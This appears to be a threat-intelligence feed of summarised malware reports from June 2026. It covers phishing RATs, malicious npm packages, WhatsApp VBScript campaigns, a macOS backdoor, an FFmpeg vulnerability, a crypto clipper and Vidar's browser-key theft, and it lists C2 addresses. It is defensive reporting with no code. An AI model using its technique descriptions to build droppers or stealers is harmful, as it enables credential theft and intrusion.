RST Cloud

We have started posting sample preprocessing analyses of threat reports from our Report Hub, showcasing results from one of the first stages of our multi-stage engine. If you have any suggestions for tweet format improvement, please send us a message

#tireport #ExtractedDiagrams The key diagram for the report (ML Classifier): schema: 1, code: 6

#threatreport #HighCompleteness An Income Tax Assessment Notice Phishing Campaign Delivering Malware | 23-06-2026 Source: cyfirma.com/research/an-in… Key details below ↓ 💀Threats: Confuserex_tool, Dll_sideloading_technique, Xworm_rat, Spear-phishing_technique, 🎯Victims: Users in india, Organizations in india 🏭Industry: Government 🌐Geo: Indian, Hong kong, China, India 📚TTPs: ⚔️Tactics: 8 🛠️Technics: 22 🧨IOCs: - Domain: 1 - File: 2 - IP: 3 - Hash: 8 🔢Algorithms: zip, sha256, md5 🔠Functions: SetAutoRun, GetWindowsVersion, GetIdleTime 🗂️Win API: DllEntry, GetSecurityInfo YARA: Found #threatreport: A recent malware campaign identified by CYFIRMA leverages a fraudulent Indian Income Tax Department-themed phishing lure to deliver a sophisticated Remote Access Trojan (RAT)-like payload. The attack primarily utilizes a phishing website hosted on the domain harivo.vip, designed to mimic authentic government communication, thus enticing victims to download malicious software masquerading as an official tax assessment notification. The lure incorporates legal language and compliance urgency to enhance its believability, prompting users to download a ZIP archive titled Tax_Assessment_0609.zip. Upon extraction, this archive reveals a malicious disk image file named Tax_Assessment.img, which contains multiple malware components including a Portable Executable (PE) file (Tax_Assessment.exe) that acts as a loader and a DLL (libsvcs.dll). Technical analysis shows that Tax_Assessment.exe employs .NET reflection to dynamically load the DLL, thereby obscuring its malicious intent and complicating static analysis attempts. Both components were obfuscated using ConfuserEx, further complicating detection and making reverse engineering challenging. The payload, libsvcs.dll, exhibits typical RAT functionalities, including methods for establishing persistent backdoor access, gathering system information, and enabling remote command execution via encrypted communications. The binary is configured to connect to a hardcoded Command-and-Control (C2) server located at 103.231.12.27:4444, utilizing an embedded 32-byte encryption key for secure communication. The threat actors behind this campaign are assessed to be financially motivated, utilizing social engineering tactics to deceive targets. The operational design reflects a structured infection methodology with multiple stages of payload delivery, maximizing flexibility while minimizing detection risks. This includes the use of misleading documents as well as techniques that hide execution behaviors and modify system registries. While the C2 infrastructure points to geolocation in Hong Kong, it is critical to note that such information does not definitively indicate the threat actors' origins, as adversaries often use compromised systems and third-party hosting to obscure their tracks. Despite the enticingly regional indicators, comprehensive attribution remains undetermined. Organizations are urged to enhance monitoring capabilities against tax-themed phishing attempts, fortify security measures around executable files, and improve detection mechanisms for suspicious behaviors associated with loader and DLL operations, particularly in response to newly observed communications and potentially malicious infrastructure.

#threatreport #MediumCompleteness From PostCSS Masquerading to Windows RAT | 23-06-2026 Source: research.jfrog.com/post/from-post… Key details below ↓ 🎯Victims: Javascript build ecosystem, Software development, Open source software ecosystem 📚TTPs: ⚔️Tactics: 3 🛠️Technics: 0 🤖LLM extracted TTPs:` T1005, T1047, T1057, T1059, T1059.001, T1059.005, T1059.007, T1071.001, T1082, T1105, ... 🧨IOCs: - File: 18 - Command: 1 - Domain: 1 - Url: 2 - IP: 1 - Hash: 6 💽Software: Chrome, curl, Nuitka, virtualbox, qemu, hyper-v, vmwaretray 🔢Algorithms: md5, aes-256-gcm, rc4, aes, gzip, zip, chacha20-poly1305 🗂️Win API: COMMAND0825INFORMATION, COMMAND0825AUTO, MSG0825LOG, NCryptOpenStorageProvider, NCryptOpenKey, NCryptDecrypt, SeDebugPrivilege 📜Programming Languages: javascript, powershell, python #threatreport: The investigation into a malicious package masquerading as the legitimate postcss-selector-parser highlights a sophisticated attack leveraging the JavaScript package ecosystem. This attack facilitates the deployment of a Windows Remote Access Trojan (RAT) that is capable of various malicious activities, including remote shell capabilities, file transfers, persistence mechanisms, host profiling, and the theft of Chrome credentials. Such obfuscation relies on the popularity of the postcss-selector-parser package, which reports over 150 million weekly downloads to social engineer unsuspecting users. The malware employs a layered architecture with dependencies on seemingly benign packages like aes-decode-runner-pro and postcss-minify-selector-parser. These packages, upon decoding, lead to a PowerShell downloader that initiates the payload chain. The end result is a downloader that fetches additional malicious components from a command-and-control (C2) infrastructure. The PowerShell script downloads a Windows payload from the domain nvidiadriver.net, extracts it to the %TEMP% directory, and executes a VBS bootstrapper, thereby further deploying the malware. Analyzing the payload reveals it operates through HTTP C2 communications, employing encrypted POST packets. It uses RC4/ARC4 for packet transport, integrating MD5 checksums for integrity. Persistence is maintained through the Windows Registry, dynamically collecting victim UUIDs and monitoring host actions, including machine checks to discern whether the malware is running in a virtual machine or a physical environment. The malware is partitioned into multiple modules, such as config.pyd, api.pyd, and audiodriver.pyd, each focusing on distinct functionalities. The command dispatcher is crucial for orchestrating operations, managing the encrypted messaging to the C2 server, and executing the requested commands. Notably, the auto.pyd module is particularly concerning as it is responsible for Chrome credential theft, referencing essential Chrome profile files and utilizing Windows decryption APIs to facilitate access to saved logins. Furthermore, the command.pyd module not only executes commands but also conducts profiling of the host environment to evade detection. It implements checks through Windows Management Instrumentation (WMI), process listings, and other indicators to ascertain if it is sandboxed within a virtualized setup. In summary, this incident illustrates a targeted package-impersonation attack that aims to exploit trust within the npm ecosystem. The real threat materializes after the initial payload is decoded, leading to robust malicious capabilities including extensive data theft and system compromise.

#threatreport #LowCompleteness Extended Rapid Response: Zimperium's On-Device Coverage of the EvilTokens Multi-Brand Phishing Campaign | 23-06-2026 Source: zimperium.com/blog/extended-… Key details below ↓ 💀Threats: Eviltokens_tool, Device_code_phishing_technique, 🎯Victims: Microsoft 365 users, Mobile users 🤖LLM extracted TTPs:` T1528, T1550.001, T1566.002, T1583.006 🔢Algorithms: aes-gcm #threatreport: The EvilTokens campaign represents a notable evolution in phishing tactics, utilizing a Phishing-as-a-Service (PhaaS) model that specifically targets users of Microsoft 365. This attack vector is marked by its sophisticated integration of device-code phishing, which allows it to operate under the guise of trusted brands like DocuSign and Adobe. Through the use of disposable Cloudflare Workers infrastructure, the campaign effectively circumvents standard security measures, making traditional static blocklisting approaches less effective against it. A critical characteristic of the EvilTokens campaign is its ability to bypass both password and multi-factor authentication (MFA). Attackers exploit the legitimate Microsoft page for device approval, enabling victims to unknowingly approve the malicious device. This approach is particularly concerning as it leverages stolen refresh tokens, granting persistent access to attackers that remains viable even after victims reset their passwords. The campaign's impact is magnified by its focus on mobile devices, which are increasingly used to open phishing links. Mobile devices typically have weaker endpoint security controls, making them more susceptible to these types of attacks. In response to these threats, Zimperium’s Mobile Threat Defense (MTD) solution has been effective in detecting and blocking the malicious URLs associated with EvilTokens at the mobile device level. This preemptive measure stops users from reaching the critical phishing step where device codes are entered. Moreover, ongoing research has led to the identification of numerous new domains associated with the EvilTokens phishing kit, indicating a broader compromise landscape. Indicators of compromise (IOCs) related to these domains are publicly accessible for further investigation, enabling organizations to strengthen their defenses against such sophisticated phishing threats.

#tireport #ExtractedDiagrams The key diagram for the report (ML Classifier): windows: 1, schema: 1

#threatreport #MediumCompleteness WhatsApp VBScript Campaign Installs ManageEngine Endpoint Central for Persistent Remote Access | 23-06-2026 Source: socradar.io/blog/whatsapp-… Key details below ↓ 💀Threats: Bitsadmin_tool, Motw_bypass_technique, Gh0st_rat, Valleyrat, 🎯Victims: Consumers, Organizations 🌐Geo: Malaysia, Spain, French, Mexico, Australia, Vietnam, Brazil, India, Taiwan, Russia, Chinese, German, Singapore, Portuguese 📚TTPs: ⚔️Tactics: 1 🛠️Technics: 0 🤖LLM extracted TTPs:` T1027, T1036, T1036.008, T1059.005, T1105, T1112, T1218.007, T1219, T1548.002, T1553.005, ... 🧨IOCs: - File: 12 - IP: 6 💽Software: WhatsApp, curl 🔢Algorithms: zip 📜Programming Languages: powershell, vbscript #threatreport: The WhatsApp VBScript campaign represents a socially engineered cyber attack wherein attackers distribute a malicious VBScript payload through hijacked WhatsApp accounts. This campaign targets a broad range of victims across multiple countries, with a notable concentration in Malaysia, which accounts for around 80% of reported incidents. The attackers seek to install ManageEngine Endpoint Central, a legitimate enterprise remote management tool, to maintain persistent control over compromised systems by exploiting the common use of WhatsApp for communication in corporate environments. The initial stage of the attack involves using obfuscation techniques to make the VBScript payload appear benign. Attackers employ localized filenames and Windows Update-themed comments to trick users into executing the scripts. The VBScript can obfuscate its operations through methods like string concatenation, encoded content, and mimicking legitimate Windows utilities such as curl or bitsadmin, which are renamed and used to fetch additional malicious payloads. In the second stage, the attack escalates as the script creates a randomized hidden directory within the system, facilitating the download of a ZIP file containing further scripts. By leveraging various methods including PowerShell and curl, the attacker extracts and executes these scripts while attempting to remove metadata that may trigger security warnings. The final stage involves the silent installation of the ManageEngine Endpoint Central agent, allowing adversaries to perform remote administration without triggering typical red flags associated with malicious binaries. Although the campaign exhibits certain characteristics that may suggest the involvement of a Chinese-speaking threat actor, no definitive attribution has been established. The presence of certain IP addresses previously linked to other malware families does not conclusively identify a single operator. This campaign raises new challenges for cybersecurity teams, as it blurs the lines between legitimate software and malicious activity, complicating detection and response efforts. Detection strategies should focus on unusual executions of wscript.exe, suspicious directory creations, and the monitoring of registry writes associated with privilege escalation. It is vital to impose network controls to block known malicious domains and scrutinize unexpected outbound connections to storage services frequently used for hosting payloads.

#threatreport #MediumCompleteness Operation FlutterBridge: The FlutterShell macOS Backdoor | 23-06-2026 Source: levelblue.com/blogs/spiderla… Key details below ↓ 🧑‍💻Actors/Campaigns: Cl-cri-1089 💀Threats: Flutterbridge, Fluttershell, Sparkle_tool, Typosquatting_technique, 🎯Victims: Macos users, Google chrome users 📚TTPs: ⚔️Tactics: 7 🛠️Technics: 12 🧨IOCs: - File: 6 - Domain: 1 - Hash: 9 💽Software: macOS, Flutter, Chrome, Google Chrome, flutter.flutter, Gatekeeper, Unix 🔢Algorithms: sha256 🔠Functions: setSparkleDelay 📜Programming Languages: javascript, objective_c 💻Platforms: apple, x86, arm #threatreport: Operation FlutterBridge has been identified as a sophisticated cyber campaign leveraging the Flutter framework to deploy macOS malware, specifically the FlutterShell backdoor. The malware operates by utilizing several Mach-O samples, demonstrating an evolution across three distinct generations. Key technical insights include its ability to maintain detection capabilities despite changes in command names and other identifiers, by separating the static binary from the command payload. At runtime, a WebView loads attacker-controlled content, allowing commands to be issued through a JavaScript message channel known as FlutterInvoke. Remarkably, the malware exhibits a conditional execution model reliant on a Command and Control (C2) server. The absence of any visible malicious behavior in the sandbox indicates that the malware remains inactive without a live C2 response. This behavior underscores the necessity for endpoint-level telemetry as the primary detection method, given that conventional behavioral sandboxes cannot simulate live C2 interactions. Further analysis reveals shared structural properties across multiple payloads, such as identical exported-symbol fingerprints and consistent architecture. The deployments utilize a two-component architecture, with a stub launcher initiating a larger dynamically linked payload library housing the Dart runtime and the malicious logic. Each payload links exclusively to system libraries like libSystem.B.dylib, bypassing standard Apple frameworks, which helps differentiate it from legitimate macOS applications. The operational strategy of the threat actor includes techniques like certificate rotation to circumvent Apple's Gatekeeper protections. Earlier generations leveraged valid Apple certificates to pass initial scrutiny, but subsequent variants have switched to self-signed artifacts for greater evasion capabilities. This approach allows the attacker to bypass revocation mechanisms effectively. The attack vector typically involves targeting users through Google/YouTube ads with keywords related to common applications, such as podcast apps or PDF converters. Victims are redirected to typosquatted domains, where they download signed app bundles that appear legitimate. Once installed, the app deceptively presents a functional interface while establishing a connection to the attacker’s domain for command execution. Specific insights also highlight payload behaviors such as attempts to modify Chrome's default search provider and suppress browser warning messages, as well as silent replacement of application bundles during update cycles. The unique attributes and operational behaviors observed in the FlutterShell malware create distinct defensive markers that can be monitored to detect anomalous activities tied to this malicious campaign.

#tireport #ExtractedDiagrams The key diagram for the report (ML Classifier): schema: 1, windows: 1, code: 10

#threatreport #MediumCompleteness A VBScript campaign distributed through WhatsApp deploying RMM software | 22-06-2026 Source: securelist.com/whatsapp-vbs-r… Key details below ↓ 💀Threats: Bitsadmin_tool, Gh0st_rat, Valleyrat, 🎯Victims: Individual users, Whatsapp users, Consumers 🏭Industry: Financial 🌐Geo: Russia, German, Taiwan, Singapore, French, Chinese, Mexico, Brazil, Vietnam, Australia, Portuguese, Malaysia, Spain, India 📚TTPs: ⚔️Tactics: 1 🛠️Technics: 0 🤖LLM extracted TTPs:` T1036, T1036.003, T1059.001, T1059.005, T1105, T1204.002, T1219, T1553.005, T1564.001, T1566.003, ... 🧨IOCs: - File: 41 - Path: 1 - IP: 6 - Hash: 41 - Domain: 8 💽Software: WhatsApp, curl 🔢Algorithms: zip 📜Programming Languages: powershell #threatreport: In June 2026, a malware campaign emerged, utilizing malicious VBScript files disseminated via WhatsApp direct messages. The campaign predominantly impacted users in Malaysia, with other affected regions including Brazil, India, Mexico, Singapore, the UK, Spain, Taiwan, Australia, Russia, and Vietnam. The primary vector for infection was WhatsApp Desktop and WhatsApp Web, where deceptive file names mimicking legitimate business documents coaxed users into executing the attachments. The VBScript triggers a multi-stage infection process culminating in the installation of Remote Monitoring and Management (RMM) software, allowing attackers remote access to the victim's system. Analysis revealed that the threat actors compromised several WhatsApp accounts, employing these stolen credentials to spread the malware through contacts. Malicious attachments were sent without additional context, increasing the likelihood of user engagement. The file names used were often financial in nature, designed to exploit social engineering vulnerabilities—examples included terms like invoices, account statements, and debt notices, localized into various languages. The initial attack stage features a VBScript that, when launched via Windows Script Host (WScript.exe), creates a working directory under C:\Users\Public\Documents. It downloads further payloads from attacker-controlled sources. Early variants of the malware employed Windows utilities such as curl.exe and bitsadmin.exe, with files renamed to resemble DLLs to minimize user detection. Additional stages see the initial script downloading two more VBScript files; one seeks to modify User Account Control (UAC) settings, while the other downloads a ZIP file containing the RMM software installation package. Each downloader creates its directory with randomized names and often applies hidden attributes to obscured content from user view. The installation process utilizes administrative privileges to ensure successful deployment of the RMM agent, indicating a sophisticated level of planning from the threat actors. Notably, the campaign’s infrastructure has shown potential links to previously identified malware such as ValleyRAT and Gh0st RAT, though definitive attribution remains uncertain. Analysis noted consistent Chinese-language comments across scripts, suggesting the involvement of a possible Chinese-speaking threat actor; however, the evidence is not robust enough for conclusive attribution. Victimology data indicates that the campaign predominantly targets individual users rather than organizations, with a broad and opportunistic approach manifested. Users are advised to exercise caution with unexpected attachments, even from recognized contacts, particularly with script or executable file types, which should only be opened after verifying their legitimacy.

#threatreport #HighCompleteness GhostShell (MB-0009): Targeting Ukraine’s UAV Operations and Defense Supply Chain | 22-06-2026 Source: blog.synapticsystems.de/ghostshell-mb-… Key details below ↓ 🧑‍💻Actors/Campaigns: Uac-0244 Gamaredon 💀Threats: Supply_chain_technique, Ghostshell, Kraken_cryptor, Mantis_botnet, Metasploit_tool, Process_injection_technique, Xray_tool, Native_loader, Vidar_stealer, Dead_drop_technique, Antidebugging_technique, Spear-phishing_technique, 🎯Victims: Ukraine, Uav operations, Drone supply chain, Military units, Technical personnel, Procurement staff, Volunteer organizations, Defense sector partners 🏭Industry: Healthcare, Military 🌐Geo: Ukraine, Kazakhstan, Ukraines, Moldova, Russia, German, Germany, Spain, Ukrainian 🔓CVEs: CVE-2025-8088 \[[Vulners](vulners.com/cve/CVE-2025-8…)] - CVSS V3.1: *8.8*, - Vulners: Exploitation: True Soft: - rarlab winrar (<7.13) CVE-2025-6218 \[[Vulners](vulners.com/cve/CVE-2025-6…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - rarlab winrar (<7.12) 📚TTPs: ⚔️Tactics: 7 🛠️Technics: 14 🧨IOCs: - File: 15 - Domain: 2 - Url: 7 - Hash: 17 - IP: 6 - Path: 1 💽Software: WinHTTP, Windows Security, Telegram, Discord, Steam, Outlook, curl, nginx 🔢Algorithms: ecdh, sha256, ecdsa, base64, xor, aes-256-gcm, aes-256-cbc, md5, gzip 🔠Functions: GetComputerName, GetUserName, CreateFile, GetTempPath 🗂️Win API: VirtualAlloc, VirtualProtect, LoadLibrary, GetProcAddress, WinHttpSetOption, GdiplusStartup, GetDC, CreateCompatibleBitmap, BitBlt, CreateProcess, ... ⚙️Win Services: bits 📜Programming Languages: visual_basic, python, golang 💻Platforms: x64 #threatreport: The GhostShell malware campaign, labeled as MB-0009, has been observed targeting Ukraine's UAV operations and defense supply chain since February 2026. This new threat actor has not been correlated with previously known groups, differentiating its activities through a specific attack infrastructure and methodology. The malware exploits vulnerabilities CVE-2025-8088 and CVE-2025-6218 to deliver malicious payloads disguised in a RAR archive named “Besomar_documentation.rar,” which mimics legitimate documentation associated with the Ukrainian drone manufacturer Besomar. The targeted entities include military units and various defense-sector personnel, indicating a focus on operational access and supply chain intelligence. The primary components of the malware's architecture involve a multi-stage infection process. The RAR archive drops a Visual Basic Script (VBS) file into the Windows Startup folder, ensuring persistence through the use of relative path traversal. This VBS file subsequently downloads additional executables—122.exe and update.exe—from a command and control (C2) domain, cloudaxis.cc. The behavior of these payloads points to sophisticated evasion techniques, including checks for sandboxes and the use of mutual TLS (mTLS) for secure communication with the C2 server, which only responds to clients that present a valid client certificate. The executable 122.exe functions as a loader utilizing a CRPT XOR overlay mechanism, capable of executing a second-stage implant directly in memory. The second-stage implant authenticates via an embedded elliptic-curve mTLS client certificate, highlighting the sophisticated use of cryptography within the attack. Conversely, update.exe acts as an in-memory loader that masquerades as a Windows service while performing anti-analysis checks and fetching payloads from the C2 infrastructure. This loader retrieves subsequent shellcode and executes it in memory, effectively evading traditional detection mechanisms. Additionally, another component, 22.exe, has been identified within this operation. It is characterized as a multi-stage launcher that utilizes AES-256-GCM encryption for configuration parameters and operates as a covert transport and proxy layer using an embedded Xray Core client. More significantly, it delivers Vidar v2, a well-known information stealer, which targets a range of sensitive user information—browser passwords, cookies, and cryptocurrency-related data—via the established proxy tunnel. The overall structure of this malware campaign demonstrates a strategic approach to targeting high-value supply chain vulnerabilities critical to Ukraine's defense capabilities. With its emphasis on covert operation and data exfiltration, GhostShell poses a significant threat, especially given its potential connections to the geopolitical landscape surrounding the Ukraine conflict. The reported use of Telegram for C2 host resolution further illustrates the flexibility and adaptability of modern cyber threat actor methodologies, complicating traditional attribution efforts, though the presence of specific identifiers, such as the self-named "GhostShell Implant CA," could provide future avenues for analysis and detection.

#tireport #ExtractedDiagrams The key diagram for the report (ML Classifier): windows: 1, schema: 1, chats: 2

#threatreport #LowCompleteness PixelSmash – Critical FFmpeg Vulnerability Turns Media Files into Weapons | 23-06-2026 Source: jfrog.com/blog/pixelsmas… Key details below ↓ 💀Threats: Pixelsmash_vuln, Supply_chain_technique, Lumma_stealer, 🎯Victims: Media processing applications, Media servers, Cloud storage platforms, Cloud transcoding services, Chat platforms, Network attached storage appliances, Smart televisions, Photo management platforms, Artificial intelligence and machine learning infrastructure, Linux desktop environments, ... 🏭Industry: Iot, Media 🔓CVEs: CVE-2026-8461 \[[Vulners](vulners.com/cve/CVE-2026-8…)] - CVSS V3.1: *8.8*, - Vulners: Exploitation: Unknown 📚TTPs: ⚔️Tactics: 2 🛠️Technics: 0 🤖LLM extracted TTPs:` T1036, T1059.004, T1190, T1203, T1204.002, T1499.004 🧨IOCs: - File: 5 💽Software: MagicYUV, Linux, Jellyfin, Slack, Discord, Telegram, Ubuntu, Debian, Fedora, Alpine, ... 🔠Functions: system, free #threatreport: A critical vulnerability has been identified in FFmpeg's MagicYUV decoder, designated CVE-2026-8461, which allows for remote code execution through specially crafted media files. This vulnerability results from a heap out-of-bounds write, with a CVSS score of 8.8, and affects numerous applications utilizing FFmpeg, including media processors like Kodi, Jellyfin, and Nextcloud. The issue can be triggered by merely processing a maliciously designed AVI, MKV, or MOV file, leading to crashes of affected applications and, in some cases, to full remote code execution. To exploit the vulnerability, an attacker must deliver a carefully crafted media file to any software that decodes video using FFmpeg’s libavcodec. This can occur through desktop applications when a user opens a malicious file or when a file is uploaded to a media server, where automatic processing would trigger the vulnerability. Notably, the attack does not require any advanced permissions or user interactions beyond the initial file delivery, making it highly dangerous and exploitable through various means, including torrent downloads that automatically place files in watched directories. The underlying cause of the vulnerability can be traced back to a rounding mismatch within the MagicYUV decoder's slice handling code. The error lies in improper validation of slice height, allowing attackers to manipulate buffer memory. The implications are serious, resulting not only in application crashes but potentially in arbitrary command execution, demonstrated through successful exploits on Jellyfin, where an attacker gained execution rights through normal media library scanning routines. The impact of PixelSmash extends widely due to FFmpeg's pervasive integration into applications across the software ecosystem, making it a supply chain vulnerability. Since FFmpeg's libavcodec is a core dependency for numerous projects, many developers do not conduct thorough audits of its codec implementations, leading to silent propagation of this critical flaw into various downstream applications. Real-world exploitation scenarios also illustrate the ease with which attackers can leverage the vulnerability. The automatic metadata extraction during media uploads to services like Nextcloud and Jellyfin, combined with how damage is executed without alerting administrators, poses significant operational risks. Systems running ongoing FFmpeg services could remain compromised without indication, allowing for potential cost-inefficient exploitation in cloud environments due to the nature of the attack. Additionally, new attack surfaces emerge in AI/ML infrastructures that process video inputs, suggesting further research into similar vulnerabilities in systems employing libavcodec for untrusted video data. It is imperative for systems that rely on FFmpeg to promptly update to patched versions or disable the vulnerable MagicYUV decoder to mitigate associated risks. This incident highlights the necessity for organizations to scrutinize their software supply chains for vulnerabilities lurking within dependencies, which can manifest severe security ramifications without direct developer involvement.

#threatreport #MediumCompleteness Crypto Clipper uses Tor and worm-like propagation for persistence and control | 18-06-2026 Source: microsoft.com/en-us/security… Key details below ↓ 💀Threats: Cryptobandits, Pyarmor_tool, Contebrew, 🎯Victims: Cryptocurrency users, Organizations, End users 📚TTPs: ⚔️Tactics: 7 🛠️Technics: 8 🧨IOCs: - File: 3 - Hash: 16 💽Software: Microsoft Defender, Microsoft Defender for Endpoint, Curl, PyInstaller, Task Scheduler 📲Wallets: tron 🪙Crypto: ethereum, bitcoin, monero 🔢Algorithms: sha256 📜Programming Languages: powershell, jscript, php, python, javascript #threatreport: A newly identified cryptocurrency clipper malware has been active since February 2026, exploiting Windows environments to conduct clipboard theft, screen capture, and cryptocurrency address substitution. This malware, referred to as a crypto clipper, operates without traditional installation methods and utilizes a Windows Script Host along with ActiveX to activate a bundled Tor client for command and control (C2) communications. Notably, it avoids using static IP infrastructure, opting instead for a more discreet Tor-based method. The malware employs a two-component architecture: a worm that ensures its propagation by creating malicious shortcuts of legitimate files on compromised devices and a clipper component that targets cryptocurrency-related data. The worm's ability to generate malicious shortcuts linked to executable payloads facilitates stealthy infection processes while maintaining resilience against detection, especially through Microsoft Defender. Upon execution, the first stage of the clipper checks for running processes to evade execution within an environment that exhibits analysis tools, such as Task Manager. Following successful checks, it establishes communication with a hidden C2 server via a local Tor proxy, polling for instructions and continuously monitoring the clipboard for cryptocurrency wallet addresses and sensitive information, including seed phrases and private keys. Defensively, the malware employs a multi-layered obfuscation strategy that complicates static analysis, using techniques such as Python-based obfuscation and encrypted components decrypted only at runtime. The operation minimizes visibility into its actions by routing traffic through localhost, obscuring the final destination, and enhancing anonymity for the attackers. Command and control is facilitated through a local interface that allows the malware to receive and execute commands. Among its notable actions, it specifically captures clipboard data related to cryptocurrencies, applying custom rules to replace legitimate addresses copied by users with those under the control of the attackers. The malware also captures screenshots at regular intervals, providing further context for the threat actor concerning the user's activities. The clipper's inherent persistence mechanisms involve creating scheduled tasks to ensure both the worm and stealer components remain operational even after system reboots. Key behaviors of this malware include clipboard monitoring and exploitation of symbolic links, further complicating detection efforts. Organizations aiming to mitigate threats of this nature should focus on tightening script execution policies, monitoring traffic for misuse of local SOCKS proxies, and employing behavioral analysis to link suspicious script activities to potential exfiltration or infiltration signs. The combination of these approaches offers a proactive path to identifying and thwarting similar lightweight, yet impactful threats in real-time.

#threatreport #LowCompleteness Inside Vidar’s ABE Bypass: From Memory Scanning to APC Injections | 18-06-2026 Source: gendigital.com/blog/insights/… Key details below ↓ 💀Threats: Vidar_stealer, Remus, Lumma_stealer, Voidstealer, Apc_injection_technique, 🎯Victims: Web browsers 🤖LLM extracted TTPs:` T1055.004, T1057, T1106, T1518.001, T1555.003 🧨IOCs: - File: 1 - Hash: 1 💽Software: Chromium 🔢Algorithms: aes-256-gcm 🔠Functions: APC 🗂️Win API: CryptProtectData, CryptProtectMemory, CryptUnprotectMemory, NtCreateProcessEx, OpenProcess, CreateDesktopA, NtQueryVirtualMemory, NtReadVirtualMemory, CreateRemoteThread, NtTestAlert, ... #threatreport: Vidar, an actively developed information-stealer, has introduced innovative techniques to bypass Application-Bound Encryption (ABE), particularly aimed at extracting the v20_master_key from browser memory. This key is crucial for decrypting any ABE-protected data associated with specific applications. Vidar's method parallels techniques used by other malware, but it achieves its goals through a unique process. Instead of seeking the key from the disk—where it is protected by multiple layers of encryption—Vidar targets the browser's memory. The process begins by identifying the target browser, which Vidar can do from an already running instance or by creating a new one. It forks the existing browser process without directly reading its memory, instead capturing a static snapshot via `NtCreateProcessEx`. If the target browser is not running, Vidar initiates a new browser session on an isolated desktop, implementing specific command-line arguments to optimize conditions for its tactics. Following this, Vidar enumerates the memory of the forked process, using `NtQueryVirtualMemory`, to identify relevant memory regions fitting its criteria (committed, private, and either readable or read-write). Vidar employs a distinctive pattern search for the encrypted v20_master_key using a predefined 32-byte signature, targeting internal node structures, specifically within the Chromium's Encryptor::KeyRing framework. Upon locating potential candidates for the key, the malware must overcome the challenge that the decryption of the key can only occur within the browser's context due to CryptProtectMemory protections. To facilitate this, Vidar uses Asynchronous Procedure Calls (APC) to inject code into the live browser process. The choice of injection method is contingent upon the presence of certain antivirus products, such as ESET or Bitdefender. If either of these is detected, Vidar uses a classic approach to queue an APC after creating a suspended thread. If not detected, it employs a special method leveraging existing threads to execute an APC immediately without requiring the thread to be in an alertable state. When the APC executes, `CryptUnprotectMemory` decrypts the key in place. Vidar verifies successful decryption by forking the browser process again and comparing values before and after the APC call. It then attempts to use the decrypted key to authenticate entries by scanning for the byte sequence characteristic of ABE data. If the key successfully decrypts data entries, Vidar preserves the updated state of the key in memory using `CryptProtectMemory`. Conversely, if decryption fails across attempts, it terminates and restarts the browser before repeating the entire process. Through its use of APC injections, which can be seen as less common and potentially stealthy, Vidar seeks to trade off traditional detection methods, continuously evolving its strategies to bypass ABE defenses and maintain its efficacy as an infostealer.

#threatreport #MediumCompleteness Five npm Packages That Hide a Windows Binary Dropper | 17-06-2026 Source: safedep.io/procwire-npm-w… Key details below ↓ 💀Threats: Bitsadmin_tool, Motw_bypass_technique, Lolbin_technique, 🎯Victims: Software supply chain, Windows users 📚TTPs: ⚔️Tactics: 2 🛠️Technics: 0 🤖LLM extracted TTPs:` T1027, T1036, T1036.005, T1059.001, T1059.003, T1059.007, T1082, T1105, T1140, T1195.001, ... 🧨IOCs: - File: 13 - Url: 3 - Email: 2 - Path: 1 - Command: 3 - Domain: 1 💽Software: Node.js, curl 🔢Algorithms: xor 🔠Functions: createServer 📜Programming Languages: powershell #threatreport: A recent cybersecurity analysis unveiled a sophisticated attack campaign utilizing five npm packages to deploy a Windows binary dropper. Launched on June 16, 2026, the campaign involved two weaponized packages: procwire@1.3.0, which functions as a Windows binary dropper, and routecraft@4.2.0, posing as an Express clone that incorporates procwire on Windows systems. The remaining three packages serve as tools for the operator, including bytecraft (a XOR utility), endpointmap (which encodes command-and-control [C2] URLs), and staticlayer (a server-side component for the dropper). The attacker compartmentalized the malicious operations across the packages in a way that allows each to appear harmless when analyzed individually. The exploitation begins with a preinstall hook in procwire, which executes during an npm install. This hook decodes a C2 endpoint stored as XOR-encoded byte arrays in the endpointmap package, subsequently downloading and executing a payload unnoticed. The attack specifically targets Windows systems, halting its execution on other platforms. The malware employs multiple methods for arbitrary binary execution on Windows hosts during the npm installation process. Notably, it utilizes three distinct download techniques (Node.js HTTPS, curl.exe, bitsadmin) and three execution methods (direct spawn, cmd.exe, PowerShell). This flexibility enhances its resilience against partial system hardening measures, including Mark-of-the-Web protections designed to suppress Windows SmartScreen alerts for downloaded executables. The payloads masquerade under names associated with legitimate software updates like msedge_update and chrome_installer. Each npm package carries a convincing description, allowing them to blend seamlessly into the npm ecosystem: procwire is described as a lifecycle and IPC library, while bytecraft is presented as a buffer transformation library. The complexity of execution is heightened by the manner in which the C2 URL is constructed, employing XOR encryption and relying on the package name as a secret key. The dropper's construction obscures its functionality from static analysis, intentionally avoiding the use of easily detectable strings. It first attempts to retrieve the payload via an HTTP GET request while pretending to be a Microsoft delivery mechanism and disabling TLS verification to avoid detection. In the event of failure, fallback methods such as curl.exe and bitsadmin ensure that the download proceeds regardless of defenses. Furthermore, it employs a fake Zone.Identifier alternate data stream to bypass SmartScreen warnings. The staticlayer package complements the dropper, operating as a server to serve the payloads but requiring a client that mimics the dropper's User-Agent. This self-hosting capability limits exposure while allowing for efficient distribution of the malicious payload. In summary, this campaign demonstrates advanced evasion tactics by separating malicious functionalities into inconspicuous components. The analysis highlights the importance of monitoring installation behaviors rather than relying solely on package reputations, as these techniques effectively shield the campaign from conventional detection methods.

#tireport #ExtractedDiagrams The key diagram for the report (ML Classifier): schema: 1, table: 1, windows: 1, code: 5, chart: 3, chats: 1, dump: 1

